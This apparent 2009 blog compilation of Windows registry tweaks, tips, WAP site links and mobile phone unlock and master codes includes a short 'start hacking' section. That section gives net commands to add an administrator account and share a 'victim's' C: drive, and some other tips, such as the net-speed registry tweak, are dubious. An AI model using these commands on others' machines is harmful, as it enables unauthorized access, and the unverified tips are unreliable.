May 23, 2009

/* How to change .exe file icon */

1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).

2. Right-click on the exe file whose ICON is to be changed.

3. Now you will see the option Change Icon…Click on that option.

4. Now the Icon Changer program will open up.

5. Icon changer will search for all the ICONS on your system so that you can select any one of those.

6. Now select the ICON of your choice and click on SET.

7. Now a popup window will appear and ask you to select from either of these two options.

  • Change embeded icon.
  • Adjust Windows to display custom icon.

Select the first option (Change embeded icon).

8. You are done.The ICON get’s changed.

May 16, 2009

/* Increase your Net speed manually no need of Any software !! */

First, u need to goto
Start, then run.
Type in regedit in the box.
Next, goto the
folder HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\VxD\MSTCP
Now, find the string Default Rcv Window.
Now, edit the number to 64240 (was 65535).
Reboot your Computer and now you have Increase your Net Speed .

/* Danger of ''ctrl+c'' in web !! */


Just try this:
1) Copy any text by 'ctrl+c'
2) Click the Link: http://www.sourcecodesworld.com/special/clipboard.asp
You will see the text you copied on the Screen which was accessed by this web page. (Check it out !!)

Do not keep sensitive data (like passwords, reditcard numbers, PIN etc.) in the clipboard while surfing the web. It is extremely easy to extract the text stored in the clipboard to steal your sensitive information.

Be cautious ...

To avoid Clipboard Hack Problem, do the following:
1. In Internet Explorer, Go to Tools -> Internet options -> Security
2. Press Custom level.
3. In the security settings, select disable under Allow paste operations via script and click on 'OK. (Now the contents of your clipboard are safe.)

/* Tips and tricks for Windows Registry !! */

Modifying the Disk Check Autochk.exe Time-out (Scandisk Delay) Value from 10 seconds to 3 Seconds

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
"AutoChkTimeOut"=dword:00000003


Disable Automatic Restart in the event of a System Crash / BSOD

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]
"AutoReboot"=dword:00000000


Disable The Windows XP Desktop Cleanup Wizard (Unused Desktop Shortcuts)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz]
"NoRun"=dword:00000001


Speed up Network Browsing by Removing Network Scheduled Tasks

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]


Disables Windows Take A Tour Bubble Popup

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\Tour]
"RunCount"=dword:00000000


Disable Remote Registry Service (Remote users to modify registry settings on your computer. Now registry can be modified only by users on your computer)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
"Start"=dword:00000004


Removes the Recent Documents from the Start menu. The system saves a shortcut to each of the non-program files the user opened most recently, and it displays the shortcuts on the Recent Documents.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsMenu"=dword:00000001


Classic Search, Full Path In Title Bar And Address Bar. This allows you to disable the new Search Assistant Dog and use the traditional search interface in Windows Explorer

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState]
"FullPath"=dword:00000000
"FullPathAddress"=dword:00000001
"Use Search Asst"="no"
"Settings"=hex:0c,00,02,00,1b,01,e7,77,60,00,00,00



Low Disk Space Notification ? This Disables Low Diskspace Warnings

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiskSpaceChecks"=dword:00000001


Do you want to Speedup the Windows XP Start Menu?

[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"="2"


Maximize Your Internet Explorer's Simultaneous Downloads From 2 to 10 Connections

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPer1_0Server"=dword:0000000a
"MaxConnectionsPerServer"=dword:0000000a


Remove the Queue-it-up, Burn to CD right click options on Windows Media Player files.

[-HKEY_CLASSES_ROOT\CLSID\{CE3FB1D1-02AE-4a5f-A6E9-D9F1B4073E6C}]
[-HKEY_CLASSES_ROOT\CLSID\{F1B9284F-E9DC-4e68-9D7E-42362A59F0FD}]
[-HKEY_CLASSES_ROOT\CLSID\{8DD448E6-C188-4aed-AF92-44956194EB1F}]


Removes Sign up with Passport Wizard when trying to sign in MSN Messenger First time

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Passport]
"RegistrationCompleted"=dword:00000001


Disables Preview (Thumbnails) of Movie File Formats (Allowing You To Move/Rename/Delete without Errors)

[-HKEY_CLASSES_ROOT\.avi\ShellEx]
[-HKEY_CLASSES_ROOT\.mpg\ShellEx]
[-HKEY_CLASSES_ROOT\.mpe\ShellEx]
[-HKEY_CLASSES_ROOT\.mpeg\ShellEx]
[-HKEY_CLASSES_ROOT\.mov\ShellEx]


Open Explorer From My Computer or Any Folder (Power users love this)

[HKEY_CLASSES_ROOT\Folder\shell]
@="explore"


Remove 'Shortcut To ...' Prefix when you create new Shortcut

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"link"=hex:00,00,00,00


This adds 'Command Prompt here' on Right Click Menu (When you right click on a Drive/Folder)

[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here]
@="Command &Prompt Here"
[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here\command]
@="cmd.exe /k cd %1 "
[HKEY_CLASSES_ROOT\Drive\shell\Command Prompt Here]
@="Command &Prompt Here"
[HKEY_CLASSES_ROOT\Drive\shell\Command Prompt Here\command]
@="cmd.exe /k cd %1 "


Remove Shared Documents folders from My Computer System Folder

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]


Disable the Unread Mail Message on the Welcome Screen

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail\]
"MessageExpiryDays"=dword:00000000


Disable Compress Old Files (This is useful when Disk Cleanup Tool Stops Responding While Compressing Old Files)

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Compress old files]


Windows Explorer Crashes When Opening Folder Containing avi/video files

[-HKEY_CLASSES_ROOT\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}]
[-HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}\InProcServer32]


Disabling the File Association Web Service (when you click on unknon file it displays 'Windows can not open this file, ... Use the web service to find the appropriate program / Select from the Program list')
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

/* Some More Registry Tips and Tweaks !! */

Remove Arrow Overlay from Desktop Shortcuts

[HKEY_CLASSES_ROOT\lnkfile]
"IsShortcut"=-


Empty Temporary Internet Files Folder When Browser Is Closed

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache]
"Persistent"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache]
"Persistent"=dword:00000000


Remove "Links" Folder From Favorites

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]
"Locked"=dword:00000001
"LinksFolderName"=""


Disable Automatic Image Re-Size in Internet Explorer

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Enable AutoImageResize"="no"


Disable Media Player EULA

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsMediaPlayer]
"GroupPrivacyAcceptance"=dword:00000001


Remove Shared Documents

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSharedDocuments"=dword:00000001


Add 'Disk Cleanup' on Right Click of a Drive

[HKEY_CLASSES_ROOT\Drive\shell\Disk Cleanup\command]
@="cleanmgr.exe /d %1"


Disable Automatic Restart in the event of a Blue Screen of Death (BSOD)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl]
"AutoReboot"=dword:00000000


Disable Shutdown Event Tracker (Shutdown Speedup)

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Reliability]
"ShutdownReasonOn"=dword:00000000
"ShutdownReasonUI"=dword:00000000


Disable the NTFS Last Access Time Stamp update

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisableLastAccessUpdate"=dword:00000001


Clear 'Recent Documents' on Log off

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies

Display Drive Letters first in 'My Computer'

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"ShowDriveLettersFirst"=dword:00000004


Change Drive Icon (You have to change the \C\ below to the drive you want to change)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\C\DefaultIcon]
""="c:\somefolder\icon.ico"


Don't Group Similar Taskbar Buttons

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarGlomming"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarGlomming"=dword:00000000


Launch Windows Desktop in a Separate Process (Internet Explorer and Windows Explorer don't crash together)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"DesktopProcess"=dword:00000001


Disable Recent Documents History

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsHistory"=dword:00000001


Disable Tracking of Broken Shortcut Links
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoResolveTrack"=dword:00000001


Prevents Internet Explorer windows from being reused

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"AllowWindowReuse"=dword:00000000


Show Detailed Information in Device Manager (can display old/removed hardware drivers)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
"DEVMGR_SHOW_DETAILS"=dword:00000001
"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"


Remove More Themes Online... from Themes Dropdown Box

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\DownloadSites]


Remove Language Bar from Taskbar

[-HKEY_CLASSES_ROOT\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090}]
@="Language bar"
"MenuTextPUI"="@%SystemRoot%\\System32\\msutb.dll,-325"

/* Shell Commands !! */

A full list of Windows Vista Shell Commands ..

AddNewProgramsFolder
Administrative Tools
AppData
AppUpdatesFolder
Cache
CD Burning
ChangeRemoveProgramsFolder
Common Administrative Tools
Common AppData
Common Desktop
Common Documents
Common Programs
Common Start Menu
Common Startup
Common Templates
CommonDownloads
CommonMusic
CommonPictures
CommonVideo
ConflictFolder
ConnectionsFolder
Contacts
ControlPanelFolder
Cookies
CredentialManager
CryptoKeys
CSCFolder
Default Gadgets
Desktop
Downloads
DpapiKeys
Favorites
Fonts
Gadgets
Games
GameTasks
History
InternetFolder
Links
Local AppData
LocalAppDataLow
LocalizedResourcesDir
MAPIFolder
My Music
My Pictures
My Video
MyComputerFolder
NetHood
NetworkPlacesFolder
OEM Links
Original Images
Personal
PhotoAlbums
Playlists
PrintersFolder
PrintHood
Profile
ProgramFiles
ProgramFilesCommon
ProgramFilesCommonX86
ProgramFilesX86
Programs
Public
PublicGameTasks
Quick Launch
Recent
RecycleBinFolder
ResourceDir
SampleMusic
SamplePictures
SamplePlaylists
SampleVideos
SavedGames
Searches
SendTo
Start Menu
Startup
SyncCenterFolder
SyncResultsFolder
SyncSetupFolder
System
SystemCertificates
SystemX86
Templates
TreePropertiesFolder
UserProfiles
UsersFilesFolder
Windows

/* Basic Needs for Hacking !! */


1. Learn about hardware - basicly how your computer works.

2. Learn about different types of software.

3. Learn DOS.(learn everything possible)

4. Learn how to make a few batch files.

5. Port scanning. ( download blues port scanner if it's your first time)

6. Learn a few programming languages
HTML,C++,Python,Perl.... (i'd recommend learning html as your first lang)

7. How to secure yourself (proxy,hiding ip etc)

8. FTP

9. TCP/Ip , UDP , DHCP ,

10. Get your hands dirty with networking

11. Learn diassembler language (its the most basic language for understanding machine language and very useful to ubderstand when anything is disassembled and decoded)

12. Learn to use a Unix os. (a Unix system is generally loaded with networking tools as well as a few hacking tools)

13. Learn how to use Exploits and compile them. (Perl and c++ is must)

/* Tips how to start Hacking !! */

1) ping command
a cool way to say hello to victim
try
ping [victims ip goes here]
if the result is request timed out then the user is ofline
if the result is reply from [ip] bytes=32 time<1ms TTL 64
the victim is online.

2)net user [anyname] /add
it adds a new net user put any name inplace of [anyname]

3)net localgroup administrators [anyname] /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.

4)net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
you can use any root dir. instead

5)net use \\victimip [nameofnetaccount]
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
where nameofnetuser is the name via which victim logs on

6)explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access! first

/* Create a drive menu for My Computer !! */

Set My Computer to work like a menu for easier access to the drives you need.
By default, the My Computer item on the Start menu is configured to work like a standard folder window. If you need to access a specific drive, select My Computer from the Start menu, wait a moment for the window to appear, and then double-click the icon for the drive you need to access.

When you're in a hurry, this two-step procedure can be time-consuming and frustrating—especially if My Computer contains a large number of drive icons. However, Windows XP makes it easy for you to configure My Computer so it works like a menu, with each drive listed as a menu item.
Here's how.

1. Right-click the Start button, and select Properties.

2. Click Customize, which is adjacent to the Start Menu radio button, and select Advanced.

3. Scroll through the Start Menu Items list box until you see My Computer.

4. Select Display As A Menu, and click OK twice.
Now, when you select My Computer from the Start menu, you'll see a menu of individual drives. To access the contents of that drive, just select the drive letter from the menu.

/* Enabling Task Manager if it is Disable !! */

Method no. 1

1. Go to Start -> Run -> Write regedit and press on Enter button.

2. Navigate to the following registry keys and verity that following settings set to default:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“DisableCAD”=dword:00000000
3. Reboot the computer.

Method .2

1. Go to Start - Run -> Write Gpedit.msc and press on Enter button.

2. Navigate to User Configuration - Administrative Templates -> System - Ctrl+Alt+Del Option

3. In the right side of the screen verity that Remove Task Manager option set to Disable or Not Configured.

4. Close Gpedit.msc

5. Go to Start - Run -> Write gpupdate /force and press on Enter button.

/* Making a file of the size u want !! */

Let us assume you want to make a file of size 10000kb
Convert it to bytes -> 10000*1024 which comes out to be 10240000 bytes

Open calculator (win key+r -> type in calc )
Choose view mode to be Scientific one
Type in 10240000 and convert it to hex it comes out to be 9C4000
Convert this value to 8 digits by padding zeroes to its left -> so finally it comes out be 009C4000

Open Command Prompt (win key + r -> type in cmd )
Type DEBUG filename.dat
it'll show file not found error ,ignore it
Type RCX -> Enter -> then last four hexadecimal numbers i.e. 4000 ->Enter
Type RBX -> Enter -> then first four hexadecimal numbers i.e. 009C->Enter
Type W ->Enter
Type Q ->Enter

W stands for write and Q for quit

Now check the file you just made by dir command ->dir filename.dat

Using the same technique you can make files as big as you want...

Another simpler method

Try this command on cmd
fsutil file createnew [path]{e.g.:-F:new foldervirus.txt} [SizeInBytes]then press enter

/* Add Photos to My Computer Properites !! */

1. Open Notepad.

2. Type the following:

[General]

Manufacturer="Marshal.R"

Model=Marshal Microsystems

[Support Information]

Line1= Your Ph No

Line2= Your Address

.....

3. Save as "oeminfo.ini" in the System32 folder.(Without Quote)

4. Create a bmp file(Your Photo) and save it the System32 folder as "oemlogo.bmp"(Without Quote).

5. Now Check your My Computer Properties.

/* Hide Windows Vista Hard drives !! */

Back up your registry before you start!

1. Open Regedit.

2. Navigate to one of these strings:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this only changes the settings for the current logged in user

HKEY_LOCALMACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer - this changes the settings for all users on the machine. You may have to create the key folder "Explorer" manually.

3. In the Explorer key folder, create a new DWORD value by right-clicking Explorer, then choosing New DWORD value. Name the value "NoDrives" (without the quotes). This value defines local and network drive visibility for each logical drive on the computer. All drives will be visible as long as this value's data is set to 0.

4. Following the table below, enter the decimal number corresponding to the drive(s) you want to hide as NoDrives value data. When you right-click on NoDrives and choose Modify, make sure you select Decimal base, not Hexadecimal.

Drive Number to hide
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
I: 256
J: 512
K: 1024
L: 2048
M: 4096
N: 8192
O: 16384
P: 32768
Q: 65536
R: 131072
S: 262144
T: 524288
U: 1048576
V: 2097152
W: 4194304
X: 8388608
Y: 16777216
Z: 33554432
All drives 67108863

If you want to hide more than one drive, you simply add the drive amounts together for a combined total.

For example, to hide the D:/ and T:/ drives, add the decimal value for the D:/ drive to the decimal value to the T:/ drive.

8 (D) + 524288 (T) = 524296

To disable all of your visible drives, set the value to 67108863.

You must reboot your PC to see your changes.

/* 50 Free WAP sites to download mp3,wallpapers,ringtones !! */

Free WAP sites to download mp3,wallpapers,ringtones

Some Cool WapSites(some cool links starts after 48)

1.Prodigits 1
Prodigits is a dating and fun portal. You can find new friends, send picture messages, play games...
http://twilightwap.com/prodigits/

2.Prodigits 2
Prodigits is a dating and fun portal. You can find new friends, chat with them, send picture messages, play games, discuss in forums...
http://wappy.to/prodigits

3.Prodigits 3
Prodigits is a dating and fun portal. You can find new friends, chat with them, send picture messages, play games, discuss in forums...
http://twilightwap.com/prodigits/index.asp

4.Twilight Zone
Games, mobile zone, animations, humour, forums, chat, dating, e-mail, music, astrology, daily tips, links...
http://twilightwap.com/

5.5390.com
access ICQ using your WAP phone and desktop through 5390.com [by infoisLive.com]
http://5390.com/index.wml

6.A Greeting Cards Site - WapCards.com
A special greeting cards web site for WAP, accessible from a PC, mobile phone or any wireless device browser. Also Offers FREE SMS, Disucssion Forum, Latest WAP/WML News, Free Address Book.
http://www.wapcardz.com/a.php3

7.After the Beep
Celebrity and Comedy voicemails. All our voicemails are available on BT Call Minder and all UK mobile phone networks - so everyone can get a great new voicemail message.
http://www.afterthebeep4u.co.uk/menu.wml

8.Aston Magic
Professional magical entertainment. corporate magic, close-up magic, children's magical parties. Member of the magic circle and equity.
http://www.astonmagic.freeserve.co.uk/aston.wml

9.Cartoonscape
Wapisodes, gag cartoons, comic strips by professional cartoonists. Wap and web cartooning service available and lots more!
http://wap.cartoonscape.com

10.Club Nk format c:
We hate the school. Get our membership and have fun!
http://nkformatc.wapmatic.de

11.Curley's
A Place for Fun & Relaxation on the Web. Music. Jokes. Online Games. Cash & Prizes. News, Sports & Weather. Horoscopes. Just kick back and have a Good Time.
http://www.wapdrive.com/curleys/

12.Cytronix
Bildschirmschoner für Vereine
http://ritz.piranho.com/a.wml

13.dateilot
looking for a penpal, friendship or more? mopilot's dating application is a fun way to find a matching date anywhere you are. Choose from one of the categories or search for specific entries.
http://dating.mopilot.com/

14.Dowap.ws Build a Web site for your Wireless Device
Dowap.ws enables anyone to create a wireless web for your wireless device, PDA, cell phone, or two-way pager in less than thirty minutes
http://www.dowap.ws


15.Dowap.ws Build a Web site for your Wireless Device
Dowap.ws enables anyone to create a wireless web for your wireless device, PDA, cell phone, or two-way pager in less than thirty minutes.
http://dowap.ws


16.Flip & Mick
Flip and Mick are comic stars trapped in your mobile phones and reduced to mere pixels in resolution.
http://wap.movingentertainment.com/h...point/menu.php


17.illusions
The ONLY wap site for OPTICAL ILLUSIONS in the world! BRAND NEW! Bonus: Brain Teasers & Word Games. ******As recommended in WHAT CELLPHONE magazine******
http://tagtag.com/illusions


18.Logo N Tone
Nokia ringtone and logo downloads via SMS
http://www.logontone.co.uk


19.Mason's Fun
A fun personalized page challenging the thoughts of others.
http://www.wapmore.com/m.d

20.mLogonTones
mLogontones is constantly growing selection of logos and ringtones including HARDCORE ADULT! Updated regularly. Links to adult content as well!!
http://tagtag.com/mlogontones


21.mopilot.com - your personal mobile agent
Facilitating and organizing the mobile use of your personal data as well as global information retrieval, mopilot has set the course to be your first choice for the latest issues and up-to-date mobile content - anywhere, anytime.
http://mopilot.com/wml/fun.wml


22.My Woolly Hat
Hilarious star sign readings, outrageous newspaper stories and a thought provoking 'Thought for the day'. Plus unbelievable complaining letters and bizarre classified ads. You'll love it!
http://www.mywoollyhat.com/wap/


23.Penny Thornton - Your Personal Astrologer
Penny Thornton Horoscopes
http://www.astrolutely.com/wap/index.wml


24.Phunkyphones.net
Phunk up your mobile phone with ringtones, logos and ring tones. Also check out the dating facility offered.
http://www.phunkyphones.com/wap/


25.Predict 4U
Horoscopes, Tarot, Dream Analysis and Love Matches. All your predictive needs in one place!
http://www.predict4u.co.uk


26.Pub Quiz Help
Answers to pub quiz questions. Win pub quizzes more often by cheating!
http://www.pubquizhelp.34sp.com/wap.wml


27.Questionserve Mobile
Ever wondered "Will I get that promotion?" or "How romantic am I?". Now you can reveal all with our series of WAP questionnaires and personality tests...
http://wap.questionserve.com/index.wml


28.Romance Women
Dating zone, Love words, kissing, dating and romance tips, romance test, polls and sexy links...
http://twilightwap.com/romance/


29.Rune-Gild
International network for students of the Runes. Online resources for members.
http://www.mackaos.com.au/Gild.wml


30.Saw-You.com
Imagine being able to instantly text message and chat/flirt with the groovy sexy people in bars clubs cafes by simply describing them!
http://www.saw-you.com


31.textfriends
Make textfriends NOW!
http://buzzed.co.uk/wap/textfriends


32.The Best Wap Sites in the World - Ever!
See examples of the best sites available on wap here: REFWAP - 'The place for facts for your fone', and ILLUSIONS - 'The only wap site for Optical Illusions in the world!'
http://get.to/bestwapsites


33.The Love Calculator
The Love Calculator determines the chance on a successful relationship between two people.
http://wap.lovecalculator.com


34.Twilight Wap Page
Cool Links, cool stuff. Chat, games, links, celebrity galleries (Cahrlize Theron) and much more...
http://www.tagtag.com/engsite


35.Twilight Zone
Interactive wap portal with huge stuff! Wap services, fun, chat, games, forums, ringtones and logos, greeting cards, wap directory, animations...
http://wappy.to/twilight


36.voteserve.com - online opinion polls
Vote on 1000s of fun and serious polls in categories like Showbiz, Politics, Lifestyle and Sport
http://wap.voteserve.com/index.wml


37.Wap Greeting Cards
Wap Greetings, send your friends cool wap greeting cards and surprise them...
http://twilightwap.com/greeting/cards.asp


38.WAP-A-GIRL
Mobile contact to girls
http://www.wap-a-girl.de/wml/index.shtml


39.WapCardz.com
A special greeting cards web site for WAP, accessible from a PC, mobile phone or any wireless device browser.
http://www.wapcardz.com/a.php3


40.WapCardz.com
A special greeting cards web site for WAP, accessible from a PC, mobile phone or any wireless device browser. Also Offers FREE SMS, Disucssion Forum, Latest WAP/WML News, Free Address Book.
http://www.wapcardz.com


41.WAPDrive
tonnes of cool WAP Sites!
http://www.wapdrive.com


42.WAPIT
Biorithmes
http://www.wapit.ksp.fi/cannes/main.wml


43.Wapmike
Haai wapfriends, ICQ, hotmail, jokes, funny Nokia-stuff, F1 live!!! all on my site, come and see!
http://tagtag.com/wapmike


44.WapplePie
WapplePie allows you to build your own custom wap menu. We call this "Bake your own WapplePie".
http://www.wapplepie.com


45.Wappy. Virtual pet
Furry art, animals and wireless communications personal page.
http://wappy.pp.ru


46.Wireless DivineWorld
Wireless DivineWorld is the real interactive WAP Tarot/Rune site, accessible directly from your mobile phone!
http://www.free-tarot.com/default.wml


47.your biorythms on WAP phone
your biorythms on WAP phone
http://webdowap.com/wap/biowap/index_us.asp


48.mobilicktastic
links to loads of websites for free screensavers and free tones they directly download2 ur fone!!
http://www.mobilicktastic.mywap.o2.co.uk/


49.mobile-empire
Find any stuff here
http://www.mobile-empire.com/


50.napwap
links to loads of websites for free screensavers and free tones they directly download2 ur fone!!
http://www.napwap.com/

/* ALL NEW MOBILE UNLOCK CODE !! */

SAMSUNG

t 209 unlock 100%ok
try it:Make sure to use a SIM card that is not accepted by that phone!

Enter reset code first?
*2767*3855# let it reboot

then enter...
*7465625*638*00000000*00000000# (to change NCK code to 00000000)

then enter...
#7465625*638*00000000# (to permanently unlock the phone


D807 NETWORK LOCK
I have tested this with my D807 and it works.

1. If you have changed your phone password, change your password back to the default 8 zeros (00000000).
1a. NOTE (Modification here by my experience): Goto SETTINGS, SECURITY, then SIM LOCK and disable this before proceeding.
2. Put a SIM card that is from a network other than the one your phone is locked to (I used a TMOBILE card from my buddy Darin)
3. When Incorrect SIM (I got invalid card and there was a sim card graphic spinning) error comes up, type *#9998*3323#.
4. White screen will appear with an exit option. Press the right softkey. (I ended up pushing the down key to get a menu)
5. From the menu that appears, select the Malloc Fail option. This will reboot the phone and the normal service screens will appear.
6. Type *0141# and then press the green call key. "Personalization" or "Personalized" will appear.
7. Turn off your phone and put the original SIM back in.
8. Turn on your phone. You will receive a prompt to enter a password.
9. Type 8 zeros (00000000) (This is because the SIM LOCK Mentioned earlier gets switched back on)
10. Completed. You have now unlocked your phone.



D807 CONTACT TRANSFER
.....................
I did some searching and found out that with the studio software from samsung you are able to edit and move contacts from your phone to the sim and back. Or copy from the phone and put them on the sim card. Just thought you all should know as there is no menu option on the phone.


************************************************** **************************************************

SPICE:
S404 enable COM port: *#42253646633# -> Device -> Set UART -> PS -> UART1/115200
S410 engineer mode: *#3646633#
S900 software version: *#8375#
S900 serial no: *#33778#
USER UNLOCK CODE:1122

************************************************** **************************************************
CHINESE MODELS:
default user code: 1122, 3344, 1234, 5678
Engineer mode: *#110*01#
Factory mode: *#987#
Enable COM port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
Restore factory settings: *#987*99#
LCD contrast: *#369#
software version: *#800#
software version: *#900#
set default language: *#0000# Send
set English language: *#0044# Send
set English language (new firmware): *#001# Send



************************************************** **************************************************
LG:
KG300 NVRAM format: 2945#*# -> menu 15


************************************************** **************************************************

SONY ERICSSON
I was speaking with a Sony Ericsson development tech today and he's given me some great codes!!

Write down your IMEI number. You can get this with the following:

*#06#

Then, you need to get into the Personalize menu with the following keypress:

< ** <

(Left, Star,Star, Left)

You then will need to select the Network at the top ( This will be locked )

It will ask for the code (the one that everyone asks for) and you need to enter in the following:

7993XXXX (where XXXX is the FIRST FOUR digits of your IMEI Number)

It will report an error and reduce your lock count by 1. Don't worry about this.

Repeat the process and enter the following:

6309XXXX ( where XXXX is the SECOND FOUR digits of your IMEI Number)

Again, it will reduce by one. Repeat again with the next two numbers:

093167XX ( where XX is the 9th and 10th digits of your IMEI Number)
323343XX ( where XX is the 11th and 12th digits of your IMEI Number)

And finally, you will need to repeat the process just one more time. This is very important, you will need to enter the following code:

XXXXYYYY - Where XXXX is the SECOND FOUR digits of your IMEI and YYYY is the FIRST FOUR digits of your IMEI.

You have to be careful, there are a few steps to follow, but these are the codes that the technicians use to unlock and test the phones that they have in for R & D.

I was very excited when I got these and it worked perfectly. I have unlocked two phones now, both K608i - One that was with Optus (Australia) and the other with Three (Australia) without any problem



************************************************** **************************************************


MOTOROLLA - F3:
Motofone F3 software version: **9999* Send
***300* Set SIM Pin
***310* / ***311* SIM Pin ON | OFF
***000* Reset Factory settings
***644* Set Voicemail number
***260* / ***261* Auto keypad lock ON | OFF
***510* / ***511* Voice Prompts ON | OFF
***160* / ***161* Restricted Calling (Phonebook only) ON | OFF
***200608* Send: software version
***200606* Send: software version
***200806* Send: flex version
***250* / ***251* Keypad tones ON | OFF
***470* Select time format
***500* /***501* Prepaid Balance Display ON | OFF
***520* Change language

L6 hold * 65512890

/* Master Code Collection !! */

ALCATEL
IMEI number: * # 0 6 #
Software version: * # 0 6 #
Net Monitor: 0 0 0 0 0 0 *
Master codes: 25228352, 25228353, 83227423 (TH3/4,BH4,BF5,BG3,BF3/4..)
Master reset (with SIM): ###337*07#
Factory reset (with SIM): ###847#
Alcatel 835 formating - **0102#

BOSCH
IMEI Number: * # 0 6 #
Dafault Language: * # 0 0 0 0 #
Net Monitor: * # 3 2 6 2 2 5 5 * 8 3 7 8 #
DANCALL
IMEI number: * # 0 6 #
Software version: * # 9 9 9 9 #

ENOL
Service menu: *#987*00#
Full reset: *#987*99#
SW version: *#900#
ERICSSON 6xx/7xx/8xx
IMEI number: * # 0 6 #
Software version: > * < < * < *

ERICSSON A1018S/T10S/T18S/T28S
IMEI number: * # 0 6 #
Software version: > * < < * < *
Default language: <>

FLY BIRD
S688: #*301#02# send - with SIM
Menu: 7 - 10 - ok
Reboot repair: #*8000#, #*3676#
Service menu: V09, S1180 - *, 3 times down, 3 times up

HUAWEI
Master security code: 309296, 3092, 9296

LG
Service menu (code reset)(W510 W3000 G5300 L1100 C1200 G7100...): 2945#*#
Hold (LG 500,600): 2945#*
Service Menu B1200: *+pwr, 6,6,8
Service Menu B1300: *+pwr, 1,5,9
Security removing code for LG 8110,8120: 47328545454# or 277634#*#

MAXON
IMEI number: * # 0 6 #
Software Version: *#9900#
Batch: *#9901#
